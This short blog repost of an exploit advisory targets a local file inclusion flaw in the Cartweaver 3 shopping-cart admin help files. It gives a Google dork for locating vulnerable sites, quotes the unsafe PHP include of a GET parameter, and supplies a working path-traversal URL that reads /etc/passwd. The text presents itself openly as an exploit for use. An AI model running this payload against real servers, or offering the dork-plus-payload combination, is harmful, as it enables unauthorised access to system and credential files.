Home »
» Cartweaver 3 LFI exploit
Cartweaver 3 LFI exploit
# Exploit Title: Cartweaver 3 LFI exploit |
# Google Dork: inurl:cw3/admin/ inurl:/admin/helpfiles/ ~ Be creative! |
# Vendor Homepage: https://www.cartweaver.com |
# Tested on: Windows 7 and Windows 8 |
Vulnerability is in the Help Documents located in /admin/helpfiles/. |
============================= |
AdminHelp.php ~ lines 42-44 |
============================= |
<?php /* Help File Body Include, populated by helpFileName variable */ |
$helpFileName = isset($_GET["helpFileName"]) ? $_GET["helpFileName"] : "AdminHome.php"; |
include("help_" . $helpFileName);?> |
http://server/cw3/admin/helpfiles/AdminHelp.php?helpFileName=a/../../../../../../../../../../../../etc/passwd |
Greetings to all members of Team INTRA<3 |
0 comentários:
Postar um comentário